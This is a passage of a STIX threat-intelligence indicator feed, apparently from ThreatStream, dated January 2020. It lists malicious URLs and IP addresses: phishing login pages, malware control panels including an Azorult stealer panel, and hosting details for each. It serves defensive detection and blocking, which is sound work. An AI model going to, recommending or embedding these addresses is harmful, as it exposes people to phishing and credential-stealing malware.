http://turames8.site/login","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://turames8.site/login']","type":"indicator","valid_from":"2020-01-27T02:56:05.787Z"} +{"created":"2020-01-27T02:56:17.615Z","description":"TS ID: 55259870820; iType: mal_url; State: active; Org: Friendhosting LTD; Source: CyberCrime","id":"indicator--f69535bc-4059-445d-90b0-1df8498137a4","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-90"],"modified":"2020-01-27T02:56:17.615Z","name":"mal_url: http://2maga.site/login","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://2maga.site/login']","type":"indicator","valid_from":"2020-01-27T02:56:17.615Z"} +{"created":"2020-01-27T02:56:17.653Z","description":"TS ID: 55259870704; iType: mal_url; State: active; Org: Friendhosting LTD; Source: CyberCrime","id":"indicator--a372cefa-0694-4e39-aa50-67be2cded923","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-91"],"modified":"2020-01-27T02:56:17.653Z","name":"mal_url: http://mogutse.site/login","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://mogutse.site/login']","type":"indicator","valid_from":"2020-01-27T02:56:17.653Z"} +{"created":"2020-01-27T02:56:22.845Z","description":"TS ID: 55259870661; iType: mal_url; State: active; Org: Friendhosting LTD; Source: CyberCrime","id":"indicator--ff74ddcd-b63b-4c1d-b4e0-8703b74564ab","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-90"],"modified":"2020-01-27T02:56:22.845Z","name":"mal_url: http://turamesplus.site/login","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://turamesplus.site/login']","type":"indicator","valid_from":"2020-01-27T02:56:22.845Z"} +{"created":"2020-01-27T02:56:23.51Z","description":"TS ID: 55259870713; iType: mal_url; State: active; Org: Friendhosting LTD; Source: CyberCrime","id":"indicator--360f60db-e8ca-4ede-9f65-7dcb01425d2e","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-90"],"modified":"2020-01-27T02:56:23.51Z","name":"mal_url: http://merops.site/login","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://merops.site/login']","type":"indicator","valid_from":"2020-01-27T02:56:23.51Z"} +{"created":"2020-01-27T02:56:23.555Z","description":"TS ID: 55259870702; iType: mal_url; State: active; Org: Friendhosting LTD; Source: CyberCrime","id":"indicator--bafd8878-321e-4501-ae0f-221772acccae","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-90"],"modified":"2020-01-27T02:56:23.555Z","name":"mal_url: http://mogut.site/login","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://mogut.site/login']","type":"indicator","valid_from":"2020-01-27T02:56:23.555Z"} +{"created":"2020-01-27T02:56:32.951Z","description":"TS ID: 55259870813; iType: mal_url; State: active; Org: Friendhosting LTD; Source: CyberCrime","id":"indicator--21811787-57db-4ca6-abb9-57d33500a88e","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-90"],"modified":"2020-01-27T02:56:32.951Z","name":"mal_url: http://2magas.site/login","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://2magas.site/login']","type":"indicator","valid_from":"2020-01-27T02:56:32.951Z"} +{"created":"2020-01-27T02:56:37.65Z","description":"TS ID: 55259870741; iType: mal_url; State: active; Org: Friendhosting LTD; Source: CyberCrime","id":"indicator--80641a7e-afbf-4b8d-96e6-4770491297b4","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-93"],"modified":"2020-01-27T02:56:37.65Z","name":"mal_url: http://merakim.site/login","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://merakim.site/login']","type":"indicator","valid_from":"2020-01-27T02:56:37.65Z"} +{"created":"2020-01-27T02:56:37.697Z","description":"TS ID: 55259870659; iType: mal_url; State: active; Org: Friendhosting LTD; Source: CyberCrime","id":"indicator--fb351f4a-90ab-4ff4-a482-b38e7f92bb77","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-90"],"modified":"2020-01-27T02:56:37.697Z","name":"mal_url: http://turamesv.site/login","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://turamesv.site/login']","type":"indicator","valid_from":"2020-01-27T02:56:37.697Z"} +{"created":"2020-01-27T02:56:41.827Z","description":"TS ID: 55259870687; iType: mal_url; State: active; Org: Friendhosting LTD; Source: CyberCrime","id":"indicator--a5ade447-681b-4518-8ea5-779d9de3ff0e","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-90"],"modified":"2020-01-27T02:56:41.827Z","name":"mal_url: http://ramesv.site/login","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://ramesv.site/login']","type":"indicator","valid_from":"2020-01-27T02:56:41.827Z"} +{"created":"2020-01-27T02:56:41.874Z","description":"TS ID: 55259870674; iType: mal_url; State: active; Org: Friendhosting LTD; Source: CyberCrime","id":"indicator--9a797de6-1aa1-4f5c-b40a-c65699117f57","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-92"],"modified":"2020-01-27T02:56:41.874Z","name":"mal_url: http://roninrol.info/login","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://roninrol.info/login']","type":"indicator","valid_from":"2020-01-27T02:56:41.874Z"} +{"created":"2020-01-27T02:56:49.344Z","description":"TS ID: 55259870678; iType: mal_url; State: active; Org: Friendhosting LTD; Source: CyberCrime","id":"indicator--7a094f4c-d57d-4bad-9258-a19210782331","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-90"],"modified":"2020-01-27T02:56:49.344Z","name":"mal_url: http://ramesvet8.site/login","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://ramesvet8.site/login']","type":"indicator","valid_from":"2020-01-27T02:56:49.344Z"} +{"created":"2020-01-27T02:56:53.905Z","description":"TS ID: 55259870709; iType: mal_url; State: active; Org: Friendhosting LTD; Source: CyberCrime","id":"indicator--6de4e500-4c56-4288-aa8f-b092f194ff78","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-90"],"modified":"2020-01-27T02:56:53.905Z","name":"mal_url: http://meropsi.site/login","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://meropsi.site/login']","type":"indicator","valid_from":"2020-01-27T02:56:53.905Z"} +{"created":"2020-01-27T02:57:06.376Z","description":"TS ID: 55259870660; iType: mal_ip; State: active; Org: Friendhosting LTD; Source: CyberCrime","id":"indicator--c4c00824-3ceb-4b3c-89a2-77d3920aacdb","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-75"],"modified":"2020-01-27T02:57:06.376Z","name":"mal_ip: 91.90.192.161","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[ipv4-addr:value = '91.90.192.161']","type":"indicator","valid_from":"2020-01-27T02:57:06.376Z"} +{"created":"2020-01-27T02:57:09.474Z","description":"TS ID: 55259870721; iType: mal_url; State: active; Org: Friendhosting LTD; Source: CyberCrime","id":"indicator--0e9df710-3a24-4070-9576-f3081708cd67","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-90"],"modified":"2020-01-27T02:57:09.474Z","name":"mal_url: http://meropa.site/login","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://meropa.site/login']","type":"indicator","valid_from":"2020-01-27T02:57:09.474Z"} +{"created":"2020-01-27T02:57:12.314Z","description":"TS ID: 55259870801; iType: mal_url; State: active; Org: Friendhosting LTD; Source: CyberCrime","id":"indicator--4d6b9fe5-43f3-42af-b7c0-171052280208","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-90"],"modified":"2020-01-27T02:57:12.314Z","name":"mal_url: http://5umaga.site/login","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://5umaga.site/login']","type":"indicator","valid_from":"2020-01-27T02:57:12.314Z"} +{"created":"2020-01-27T02:57:12.344Z","description":"TS ID: 55259870773; iType: mal_url; State: active; Org: Friendhosting LTD; Source: CyberCrime","id":"indicator--50a15dd9-290b-4240-9245-bbe259bcc4c7","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-75"],"modified":"2020-01-27T02:57:12.344Z","name":"mal_url: http://dufre1.site/login","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://dufre1.site/login']","type":"indicator","valid_from":"2020-01-27T02:57:12.344Z"} +{"created":"2020-01-27T02:57:17.92Z","description":"TS ID: 55259870746; iType: mal_url; State: active; Org: Friendhosting LTD; Source: CyberCrime","id":"indicator--53b80678-1eeb-433c-bd54-fd1ae9c83c18","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-76"],"modified":"2020-01-27T02:57:17.92Z","name":"mal_url: http://dufre-tom.site/login","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://dufre-tom.site/login']","type":"indicator","valid_from":"2020-01-27T02:57:17.92Z"} +{"created":"2020-01-27T02:57:19.085Z","description":"TS ID: 55259870735; iType: mal_url; State: active; Org: Friendhosting LTD; Source: CyberCrime","id":"indicator--b14f43dd-6653-42d4-b0db-3cf4e7fbee87","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-90"],"modified":"2020-01-27T02:57:19.085Z","name":"mal_url: http://meropi.site/login","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://meropi.site/login']","type":"indicator","valid_from":"2020-01-27T02:57:19.085Z"} +{"created":"2020-01-28T02:58:19.372Z","description":"TS ID: 55263242048; iType: mal_url; State: active; Org: IHNetworks, LLC; Source: CyberCrime","id":"indicator--e2cdc754-bf45-4c4e-a98a-0fcc1a62cc63","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-83"],"modified":"2020-01-28T02:58:19.372Z","name":"mal_url: http://serv-node4.top/Lokivo/Panel/five/PvqDq929BSx_A_D_M1n_a.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://serv-node4.top/Lokivo/Panel/five/PvqDq929BSx_A_D_M1n_a.php']","type":"indicator","valid_from":"2020-01-28T02:58:19.372Z"} +{"created":"2020-01-28T02:58:19.396Z","description":"TS ID: 55263242003; iType: mal_url; State: active; Org: Informacines sistemos ir technologijos, UAB; Source: CyberCrime","id":"indicator--f0aa41c1-9c01-420f-9134-20fa6a00f8e5","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-86"],"modified":"2020-01-28T02:58:19.396Z","name":"mal_url: http://usarmyvacations.info/ssd/login.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://usarmyvacations.info/ssd/login.php']","type":"indicator","valid_from":"2020-01-28T02:58:19.396Z"} +{"created":"2020-01-28T02:58:26.492Z","description":"TS ID: 55263242014; iType: mal_url; State: active; Source: CyberCrime","id":"indicator--15b60240-37eb-41c9-9e66-872f19406f6d","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-90"],"modified":"2020-01-28T02:58:26.492Z","name":"mal_url: http://la6e51ed.justinstalledpanel.com/login","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://la6e51ed.justinstalledpanel.com/login']","type":"indicator","valid_from":"2020-01-28T02:58:26.492Z"} +{"created":"2020-01-28T02:58:26.52Z","description":"TS ID: 55263241842; iType: mal_url; State: active; Org: Choopa, LLC; Source: CyberCrime","id":"indicator--6a3a7dfd-7dd0-4b5b-b614-b09f20ae34f3","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-49"],"modified":"2020-01-28T02:58:26.52Z","name":"mal_url: http://209.250.247.253/panel/admin.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://209.250.247.253/panel/admin.php']","type":"indicator","valid_from":"2020-01-28T02:58:26.52Z"} +{"created":"2020-01-28T02:58:43.041Z","description":"TS ID: 55263242045; iType: mal_url; State: active; Org: LeaseWeb Netherlands B.V.; Source: CyberCrime","id":"indicator--d2de10c5-aaee-4c32-ac0c-0d17ea9c7caf","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-89"],"modified":"2020-01-28T02:58:43.041Z","name":"mal_url: http://footlooking.kl.com.ua/panel/admin.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://footlooking.kl.com.ua/panel/admin.php']","type":"indicator","valid_from":"2020-01-28T02:58:43.041Z"} +{"created":"2020-01-28T02:58:43.095Z","description":"TS ID: 55263242017; iType: mal_ip; State: active; Source: CyberCrime","id":"indicator--8391ee32-499a-4390-b81d-5bd14638be82","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-68"],"modified":"2020-01-28T02:58:43.095Z","name":"mal_ip: 2.57.184.184","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[ipv4-addr:value = '2.57.184.184']","type":"indicator","valid_from":"2020-01-28T02:58:43.095Z"} +{"created":"2020-01-28T02:58:45.172Z","description":"TS ID: 55263242019; iType: mal_url; State: active; Org: SPRINTHOST.RU - shared/premium hosting, VDS, dedic; Source: CyberCrime","id":"indicator--1a91efe1-ff09-49b2-801b-fb815c843976","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-75"],"modified":"2020-01-28T02:58:45.172Z","name":"mal_url: http://a0377875.xsph.ru/login","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://a0377875.xsph.ru/login']","type":"indicator","valid_from":"2020-01-28T02:58:45.172Z"} +{"created":"2020-01-28T02:58:46.345Z","description":"TS ID: 55263241963; iType: mal_url; State: active; Org: IHNetworks, LLC; Source: CyberCrime","id":"indicator--9980de5d-7c0e-456a-b2bf-32544fda592b","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-67"],"modified":"2020-01-28T02:58:46.345Z","name":"mal_url: http://samaaj.org.pk/ofo/panel/admin.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://samaaj.org.pk/ofo/panel/admin.php']","type":"indicator","valid_from":"2020-01-28T02:58:46.345Z"} +{"created":"2020-01-28T02:58:54.765Z","description":"TS ID: 55263242018; iType: mal_url; State: active; Org: SPRINTHOST.RU - shared/premium hosting, VDS, dedic; Source: CyberCrime","id":"indicator--5da6cfdf-c2a5-45d5-857e-110fc26336f4","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-69"],"modified":"2020-01-28T02:58:54.765Z","name":"mal_url: http://f0390226.xsph.ru/login","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://f0390226.xsph.ru/login']","type":"indicator","valid_from":"2020-01-28T02:58:54.765Z"} +{"created":"2020-01-28T02:58:57.481Z","description":"TS ID: 55263242026; iType: mal_url; State: active; Org: IHNetworks, LLC; Source: CyberCrime","id":"indicator--5a32ccb0-c749-4286-a606-f3bfe9a61084","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-67"],"modified":"2020-01-28T02:58:57.481Z","name":"mal_url: http://samaaj.org.pk/justices/panel/admin.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://samaaj.org.pk/justices/panel/admin.php']","type":"indicator","valid_from":"2020-01-28T02:58:57.481Z"} +{"created":"2020-01-28T02:59:19.105Z","description":"TS ID: 55263242012; iType: mal_url; State: active; Source: CyberCrime","id":"indicator--c26773dc-80be-48c8-98fd-409174bfd0e2","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-56"],"modified":"2020-01-28T02:59:19.105Z","name":"mal_url: http://193.142.59.3/teejay/logs/omc.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://193.142.59.3/teejay/logs/omc.php']","type":"indicator","valid_from":"2020-01-28T02:59:19.105Z"} +{"created":"2020-01-28T02:59:23.53Z","description":"TS ID: 55263242004; iType: mal_ip; State: active; Org: Informacines sistemos ir technologijos, UAB; Source: CyberCrime","id":"indicator--642f909c-b1e7-4b17-9786-c01371f5da67","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-59"],"modified":"2020-01-28T02:59:23.53Z","name":"mal_ip: 88.119.160.89","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[ipv4-addr:value = '88.119.160.89']","type":"indicator","valid_from":"2020-01-28T02:59:23.53Z"} +{"created":"2020-01-28T02:59:26.887Z","description":"TS ID: 55263242013; iType: mal_url; State: active; Source: CyberCrime","id":"indicator--b50c1f06-f68e-4842-a1ac-cddef3c2ff05","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-90"],"modified":"2020-01-28T02:59:26.887Z","name":"mal_url: http://ld7cad07.justinstalledpanel.com/login","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://ld7cad07.justinstalledpanel.com/login']","type":"indicator","valid_from":"2020-01-28T02:59:26.887Z"} +{"created":"2020-01-28T02:59:27.047Z","description":"TS ID: 55263241837; iType: mal_ip; State: active; Org: IHNetworks, LLC; Source: CyberCrime","id":"indicator--ab7dae9a-3218-40dd-984c-a928336e1ccb","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-38"],"modified":"2020-01-28T02:59:27.047Z","name":"mal_ip: 162.219.248.137","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[ipv4-addr:value = '162.219.248.137']","type":"indicator","valid_from":"2020-01-28T02:59:27.047Z"} +{"created":"2020-01-28T02:59:34.735Z","description":"TS ID: 55263242041; iType: mal_url; State: active; Org: ColoCrossing; Source: CyberCrime","id":"indicator--fc149a8c-3d46-47f7-b0c2-9764d7291336","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-29"],"modified":"2020-01-28T02:59:34.735Z","name":"mal_url: http://192.210.238.10/emmy/PvqDq929BSx_A_D_M1n_a.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://192.210.238.10/emmy/PvqDq929BSx_A_D_M1n_a.php']","type":"indicator","valid_from":"2020-01-28T02:59:34.735Z"} +{"created":"2020-01-28T02:59:34.772Z","description":"TS ID: 55263241981; iType: mal_url; State: active; Org: Hostgator Asian Operations Division.; Source: CyberCrime","id":"indicator--167c21ca-7d6b-455c-954a-91a5f036616d","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-86"],"modified":"2020-01-28T02:59:34.772Z","name":"mal_url: http://aivazidis.gq/mad-ooo/PvqDq929BSx_A_D_M1n_a.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://aivazidis.gq/mad-ooo/PvqDq929BSx_A_D_M1n_a.php']","type":"indicator","valid_from":"2020-01-28T02:59:34.772Z"} +{"created":"2020-01-28T02:59:39.12Z","description":"TS ID: 55263241978; iType: mal_url; State: active; Org: IHNetworks, LLC; Source: CyberCrime","id":"indicator--8a35f477-32b2-4735-9e85-743115f1e83f","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-67"],"modified":"2020-01-28T02:59:39.12Z","name":"mal_url: http://samaaj.org.pk/Elvis/panel/admin.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://samaaj.org.pk/Elvis/panel/admin.php']","type":"indicator","valid_from":"2020-01-28T02:59:39.12Z"} +{"created":"2020-01-28T02:59:54.142Z","description":"TS ID: 55263242015; iType: mal_url; State: active; Source: CyberCrime","id":"indicator--efcb1909-e772-4001-a96c-97c293baa98d","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-86"],"modified":"2020-01-28T02:59:54.142Z","name":"mal_url: http://l3b57852.justinstalledpanel.com/login","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://l3b57852.justinstalledpanel.com/login']","type":"indicator","valid_from":"2020-01-28T02:59:54.142Z"} +{"created":"2020-01-28T02:59:54.166Z","description":"TS ID: 55263241966; iType: mal_url; State: active; Org: IHNetworks, LLC; Source: CyberCrime","id":"indicator--b5c97605-a434-4b73-a655-acc88db57cb7","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-67"],"modified":"2020-01-28T02:59:54.166Z","name":"mal_url: http://samaaj.org.pk/fk/panel/admin.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://samaaj.org.pk/fk/panel/admin.php']","type":"indicator","valid_from":"2020-01-28T02:59:54.166Z"} +{"created":"2020-01-28T02:59:54.193Z","description":"TS ID: 55263241841; iType: mal_url; State: active; Source: CyberCrime","id":"indicator--10690da4-ed16-4fac-bae7-25a1b17db17d","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-55"],"modified":"2020-01-28T02:59:54.193Z","name":"mal_url: http://217.8.117.29/34DEF67D-347D-4799-A12D-84D8482E3B54/azorult/admin.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://217.8.117.29/34DEF67D-347D-4799-A12D-84D8482E3B54/azorult/admin.php']","type":"indicator","valid_from":"2020-01-28T02:59:54.193Z"} +{"created":"2020-01-28T02:59:54.253Z","description":"TS ID: 55263241840; iType: mal_ip; State: active; Org: Uaservers Network; Source: CyberCrime","id":"indicator--dff78d62-6939-4d47-a5b3-0c275a472f7f","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-88"],"modified":"2020-01-28T02:59:54.253Z","name":"mal_ip: 82.118.22.36","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[ipv4-addr:value = '82.118.22.36']","type":"indicator","valid_from":"2020-01-28T02:59:54.253Z"} +{"created":"2020-01-28T03:00:08.397Z","description":"TS ID: 55263242037; iType: mal_url; State: active; Org: Avguro Technologies Ltd. Hosting service provider; Source: CyberCrime","id":"indicator--c1f7d2e7-4186-47c6-a29b-cdb9bb524732","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-68"],"modified":"2020-01-28T03:00:08.397Z","name":"mal_url: http://j1034033.myjino.ru/laskovo/admin.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://j1034033.myjino.ru/laskovo/admin.php']","type":"indicator","valid_from":"2020-01-28T03:00:08.397Z"} +{"created":"2020-01-28T03:00:08.446Z","description":"TS ID: 55263241846; iType: mal_url; State: active; Org: UAB Cherry Servers; Source: CyberCrime","id":"indicator--2ffd18da-452a-462b-a264-4c457564de62","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-61"],"modified":"2020-01-28T03:00:08.446Z","name":"mal_url: http://85.204.74.152/xcool!/admin.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://85.204.74.152/xcool!/admin.php']","type":"indicator","valid_from":"2020-01-28T03:00:08.446Z"} +{"created":"2020-01-28T03:00:22.832Z","description":"TS ID: 55263242001; iType: mal_url; State: active; Org: IHNetworks, LLC; Source: CyberCrime","id":"indicator--bdb1bbc0-4cfe-484b-8c99-22ff164e345d","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-67"],"modified":"2020-01-28T03:00:22.832Z","name":"mal_url: http://samaaj.org.pk/ejima/panel/admin.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://samaaj.org.pk/ejima/panel/admin.php']","type":"indicator","valid_from":"2020-01-28T03:00:22.832Z"} +{"created":"2020-01-28T03:00:23.929Z","description":"TS ID: 55263241843; iType: mal_url; State: active; Org: Saginaw Valley State University; Source: CyberCrime","id":"indicator--b708bbd4-d0f4-406e-926e-086fd1bd096e","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-75"],"modified":"2020-01-28T03:00:23.929Z","name":"mal_url: http://155.138.222.174/panel/admin.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://155.138.222.174/panel/admin.php']","type":"indicator","valid_from":"2020-01-28T03:00:23.929Z"} +{"created":"2020-01-28T03:00:30.838Z","description":"TS ID: 55263241974; iType: mal_url; State: active; Org: IHNetworks, LLC; Source: CyberCrime","id":"indicator--384ff3f4-d643-4b23-ad90-9b4fa7524db8","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-67"],"modified":"2020-01-28T03:00:30.838Z","name":"mal_url: http://samaaj.org.pk/emp/panel/admin.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://samaaj.org.pk/emp/panel/admin.php']","type":"indicator","valid_from":"2020-01-28T03:00:30.838Z"} +{"created":"2020-01-28T03:00:52.335Z","description":"TS ID: 55263242016; iType: mal_url; State: active; Source: CyberCrime","id":"indicator--b5e5a709-1001-4905-9019-d69e53b8393d","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-81"],"modified":"2020-01-28T03:00:52.335Z","name":"mal_url: http://minecraft-only.ru/login","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://minecraft-only.ru/login']","type":"indicator","valid_from":"2020-01-28T03:00:52.335Z"} +{"created":"2020-01-28T03:01:04.475Z","description":"TS ID: 55263242040; iType: mal_url; State: active; Org: Uaservers Network; Source: CyberCrime","id":"indicator--910b12d0-b553-4219-846e-824ea3be86f8","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-88"],"modified":"2020-01-28T03:01:04.475Z","name":"mal_url: http://buythebest.pw/panel/admin.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://buythebest.pw/panel/admin.php']","type":"indicator","valid_from":"2020-01-28T03:01:04.475Z"} +{"created":"2020-01-28T03:01:04.538Z","description":"TS ID: 55263242010; iType: mal_url; State: active; Org: LeaseWeb Netherlands B.V.; Source: CyberCrime","id":"indicator--6e7ba339-ede0-47fd-a6c9-bd1ffb61fbbf","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-87"],"modified":"2020-01-28T03:01:04.538Z","name":"mal_url: http://smtress.zzz.com.ua/admin/admin.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://smtress.zzz.com.ua/admin/admin.php']","type":"indicator","valid_from":"2020-01-28T03:01:04.538Z"} +{"created":"2020-01-28T03:01:31.533Z","description":"TS ID: 55263241845; iType: mal_url; State: active; Org: Choopa, LLC; Source: CyberCrime","id":"indicator--1d0c2a7c-ba78-4e9f-ae7a-4ce2988357b1","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-24"],"modified":"2020-01-28T03:01:31.533Z","name":"mal_url: http://149.28.199.128/panel/admin.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://149.28.199.128/panel/admin.php']","type":"indicator","valid_from":"2020-01-28T03:01:31.533Z"} +{"created":"2020-01-29T02:59:29.937Z","description":"TS ID: 55266539002; iType: mal_url; State: active; Org: Cloudflare; Source: CyberCrime","id":"indicator--b78ae5fd-ee1e-49ab-9519-fb62ba1bb26a","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-74"],"modified":"2020-01-29T02:59:29.937Z","name":"mal_url: http://ecoorganic.co/Work6/PvqDq929BSx_A_D_M1n_a.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://ecoorganic.co/Work6/PvqDq929BSx_A_D_M1n_a.php']","type":"indicator","valid_from":"2020-01-29T02:59:29.937Z"} +{"created":"2020-01-29T03:00:21.905Z","description":"TS ID: 55266539006; iType: mal_url; State: active; Org: Cloudflare; Source: CyberCrime","id":"indicator--ec4322a7-481b-4787-8df2-e3b3bc0c8b8b","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-74"],"modified":"2020-01-29T03:00:21.905Z","name":"mal_url: http://ecoorganic.co/Work2/PvqDq929BSx_A_D_M1n_a.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://ecoorganic.co/Work2/PvqDq929BSx_A_D_M1n_a.php']","type":"indicator","valid_from":"2020-01-29T03:00:21.905Z"} +{"created":"2020-01-29T03:00:29.782Z","description":"TS ID: 55266539008; iType: mal_url; State: active; Org: Cloudflare; Source: 